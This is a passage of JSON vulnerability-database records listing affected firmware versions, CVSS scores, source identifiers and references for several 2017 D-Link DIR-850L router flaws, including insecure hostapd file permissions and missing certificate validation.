"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A and REV.B Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=234999"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008104"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-565"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008104"
},
{
"db": "NVD",
"id": "CVE-2017-14430"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14430"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14430"
},
{
"trust": 0.6,
"url": "http://www.exploitalert.com/view-details.html?id=27497"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-33063"
},
{
"db": "VULHUB",
"id": "VHN-105152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008104"
},
{
"db": "NVD",
"id": "CVE-2017-14430"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-565"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-33063"
},
{
"db": "VULHUB",
"id": "VHN-105152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008104"
},
{
"db": "NVD",
"id": "CVE-2017-14430"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-565"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-33063"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105152"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008104"
},
{
"date": "2017-09-13T17:29:00.900000",
"db": "NVD",
"id": "CVE-2017-14430"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-565"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-33063"
},
{
"date": "2017-09-20T00:00:00",
"db": "VULHUB",
"id": "VHN-105152"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008104"
},
{
"date": "2023-11-17T20:01:41.363000",
"db": "NVD",
"id": "CVE-2017-14430"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-565"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-565"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerability related to input validation in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008104"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-565"
}
],
"trust": 0.6
}
}
VAR-201709-0599
Vulnerability from variot - Updated: 2023-12-18 13:43D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/run/hostapd* permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could exploit this vulnerability to obtain a wireless password
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0599",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31798"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008103"
},
{
"db": "NVD",
"id": "CVE-2017-14428"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-567"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14428"
}
]
},
"cve": "CVE-2017-14428",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.1,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-14428",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2017-31798",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-105149",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14428",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14428",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-31798",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-567",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105149",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31798"
},
{
"db": "VULHUB",
"id": "VHN-105149"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008103"
},
{
"db": "NVD",
"id": "CVE-2017-14428"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-567"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/run/hostapd* permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could exploit this vulnerability to obtain a wireless password",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14428"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008103"
},
{
"db": "CNVD",
"id": "CNVD-2017-31798"
},
{
"db": "VULHUB",
"id": "VHN-105149"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14428",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008103",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-567",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31798",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105149",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31798"
},
{
"db": "VULHUB",
"id": "VHN-105149"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008103"
},
{
"db": "NVD",
"id": "CVE-2017-14428"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-567"
}
]
},
"id": "VAR-201709-0599",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31798"
},
{
"db": "VULHUB",
"id": "VHN-105149"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31798"
}
]
},
"last_update_date": "2023-12-18T13:43:58.924000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A and REV.B Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100047"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008103"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-567"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105149"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008103"
},
{
"db": "NVD",
"id": "CVE-2017-14428"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14428"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14428"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31798"
},
{
"db": "VULHUB",
"id": "VHN-105149"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008103"
},
{
"db": "NVD",
"id": "CVE-2017-14428"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-567"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31798"
},
{
"db": "VULHUB",
"id": "VHN-105149"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008103"
},
{
"db": "NVD",
"id": "CVE-2017-14428"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-567"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31798"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105149"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008103"
},
{
"date": "2017-09-13T17:29:00.837000",
"db": "NVD",
"id": "CVE-2017-14428"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-567"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31798"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-105149"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008103"
},
{
"date": "2023-11-17T19:59:23.433000",
"db": "NVD",
"id": "CVE-2017-14428"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-567"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-567"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerabilities related to authorization, authority, and access control in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008103"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-567"
}
],
"trust": 0.6
}
}
VAR-201709-0591
Vulnerability from variot - Updated: 2023-12-18 13:38The D-Link NPAPI extension, as used on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices, does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. D-Link DIR-850L There is a certificate validation vulnerability in the device firmware.Information may be obtained. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the D-LinkDIR-850LREV.A using FW114WWb07_h2ab_beta1 and previous firmware and the D-LinkNPAPI extension used in the REV.B device using FW208WWb02 and previous firmware. The vulnerability stems from the program failing to verify the X of the SSL server. 509 certificate
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0591",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31789"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008139"
},
{
"db": "NVD",
"id": "CVE-2017-14420"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-575"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw114wwb07_h2ab_beta1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14420"
}
]
},
"cve": "CVE-2017-14420",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-14420",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-31789",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
